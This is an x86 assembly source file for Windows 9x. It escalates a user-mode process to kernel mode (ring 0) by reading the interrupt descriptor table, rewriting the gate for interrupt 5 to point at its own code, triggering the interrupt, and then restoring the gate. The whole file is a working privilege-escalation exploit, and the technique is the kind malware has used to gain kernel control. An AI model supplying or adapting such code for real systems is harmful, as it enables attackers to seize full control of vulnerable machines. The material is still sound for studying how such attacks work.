; This program switches ring from ring 3 to ring 0   
; It utillizes the fact that the page where the IDT is store is not protected in
; win 9x.
; it fetches the gate of an exception and then saves it.
; then it makes the exception points down to code within the process context
; then it causes the exception which succesfully transfers to a ring 0 selector
; it iret's the interupt and restores the original gate so other programs can 
; use it safely.

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL			; with STDCALL we must reverse the sequence of pushes 
					; before a APIn call. 

UNICODE = 0				; Needed for w32.inc
INCLUDE W32.inc				; Windows definitions, messages, errors, structures,
					; API functions declarations. Some additions of mine.
					; Thanks to Barry Kauler and Sven Schreiber. 


lp EQU  OFFSET
extrn	SetUnhandledExceptionFilter : PROC

.DATA
skod db 0
lpOldGate  dd 0 
IDT	db 6 dup (0)
;---- Error Messages
szExceptionCaused db "Exception Caused - could not switch to ring 0",0
szError		  db "Error",0

ExceptionUsed	EQU 5

.CODE
start:
	
	call   SetUnhandledExceptionFilter, lp ExceptCallBack	; Catch exceptions 
								; (security if ring transform
								; doesn't work)
	sidt	fword ptr IDT			; fetch IDT register

	mov 	ebx, dword ptr [IDT+2]		; ebx -> IDT
	add	ebx, 8*ExceptionUsed		; Ebx -> IDT entry of ExceptionUsed


	cli					; Clear interupts

	mov	dx, word ptr [ebx+6]		; Save the current gate highword
	shl	edx, 16d
	mov	dx, word ptr [ebx]		; lowword
	mov	[lpOldGate], edx

	mov	eax, offset Ring0Code		; "install hook" - that is newgate
	mov	word ptr [ebx], ax		; lowword
	shr	eax, 16d
	mov	word ptr [ebx+6], ax		; highword

	int 	ExceptionUsed			; cause exception

	mov	ebx, dword ptr [IDT+2]		; restore gate
	add	ebx, 8*ExceptionUsed
	mov	edx, [lpOldGate]
	mov	word ptr [ebx], dx
	shr	edx, 16d
	mov	word ptr [ebx+6], dx
	

	CALL	ExitProcess, -1			; exit


Ring0Code PROC
	mov	eax, cr0		; Ring0 code here.. 

	iretd
Ring0Code ENDP

ExceptCallBack PROC
	call    MessageBoxA, 0, lp szError, lp szExceptionCaused, 0
	call	ExitProcess, -1
	ret
ExceptCallBack ENDP
	

ends
end start
